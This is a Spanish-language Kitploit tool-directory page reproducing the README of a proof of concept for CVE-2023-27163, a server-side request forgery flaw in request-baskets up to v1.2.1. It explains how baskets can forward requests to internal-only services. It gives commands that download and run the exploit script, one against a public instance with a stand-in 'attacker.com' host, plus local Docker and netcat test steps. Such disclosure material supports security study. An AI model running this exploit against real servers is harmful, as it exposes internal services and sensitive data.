Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27163 — Prueba de concepto para Falsificación de Solicitud del Lado del Servidor (SSRF) en request-baskets (<= v.1.2.1) | Kitploit
Herramientas/GitHubGitHub/entr0pie/cve-2023-27163
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Prueba de concepto para Falsificación de Solicitud del Lado del Servidor (SSRF) en request-baskets (<= v.1.2.1)

Ver Repositorio
315hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Sitio web
Compartir

PoC de SSRF en Request-Baskets (CVE-2023-27163)

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2023-27163, una vulnerabilidad de Server-Side Request Forgery (SSRF) descubierta en request-baskets hasta la versión 1.2.1. Esta vulnerabilidad permite a atacantes acceder a recursos de red e información sensible explotando el componente /api/baskets/{name} mediante una solicitud API manipulada.

Créditos a @b33t1e, @chelinboo147 y @houqinsheng (ver artículo).

Uso

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

¿Cómo funciona?

Request-baskets es una aplicación web construida para recolectar y registrar solicitudes en una ruta específica, llamada basket. Al crearla, el usuario puede especificar otro servidor para reenviar la solicitud. El problema aquí es que el usuario puede especificar servicios no deseados, como aplicaciones cerradas a la red.

Por ejemplo: supongamos que el servidor aloja Request-baskets (puerto 55555) y un servidor web Flask en el puerto 8000. Flask también está configurado para interactuar solo con localhost. Al crear un basket que reenvíe a http://localhost:8000, el atacante puede acceder al servidor web Flask previamente restringido.

Prueba en localhost

Imagen de PoC

  1. Inicie el contenedor Docker de Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Descargue la PoC
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Espere una conexión
root@kitploit:~
nc -lvp 8000
  1. Guarde la dirección IP del host Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Ejecute la PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Licencia

Este proyecto está bajo la Unlicense.

Descargar herramienta